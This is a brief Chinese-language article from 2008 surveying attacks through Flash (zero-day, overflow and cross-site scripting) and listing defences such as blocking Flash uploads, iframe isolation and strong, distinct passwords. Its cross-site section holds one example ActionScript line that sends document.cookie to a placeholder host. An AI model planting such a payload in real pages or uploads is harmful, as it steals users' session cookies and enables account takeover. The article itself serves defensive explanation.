Flash 攻击简述

作者:vkvi 来源:ITPOW(原创) 日期:2008-8-13

0Day 攻击

也就是利用 Falsh 控件本身的漏洞进行的攻击,可以将控件升级到最新版本进行解决。

溢出攻击

同其它程序一样利用 Flash 控件的漏洞进行数据溢出,以运行非法的指令,可以将控件升级到最新版本进行解决。

跨站攻击

攻击者在 Flash 中插入特定的脚本,比如:

getURL("javascript:window.open('http://.../getCookie.aspx?c=' + document.cookie);");

然后将该 Flash 文件传送到论坛上(比如是论坛),等其它论坛用户打开含有该 Flash 的页面时,就会弹出一个窗口,该窗口的 URL 中就会含有该用户的 cookie 信息(实际攻击中可能会使用更隐蔽的手段,而不是直接弹出窗口)。

  • 如果 cookie 信息包含密码,攻击者就可以暴力破解该密码。
  • 如果 cookie 信息不包含密码,攻击者也可以在用户退出之前,重用该 cookie,让服务器认为攻击者就是用户本人。

我不知道最新版本的 Flash 控件或浏览器是否解决了些问题,不过我认为目前很多客户端还是存在此问题的。

实际中可能会使用多种攻击手段联合攻击,我们的预防手段是:

  • 坚决不能使用服务器上网,服务器上不能安装 Flash 控件。
  • 不允许上传 Flash,显示外站的 Flash 时,不要直接嵌在本站中,而是用 iframe 引用,此时就用建立两个会话:本站一个,外站一个。发送的 cookie 是外站的 cookie,不会导致本站的 cookie 泄漏。
  • 检查用户提交的数据,避免用户直接把 Flash 嵌在提交的内容中。
  • 不要使用默认密码或过于简单的密码。不同环境中的密码不要一样,比如不要将你很信赖的站点的用户密码设置成与你根本不信赖的站点的用户密码一样。
  • 密码加密要够“硬”。
  • 安装杀毒软件等安全软件。

 

相关文章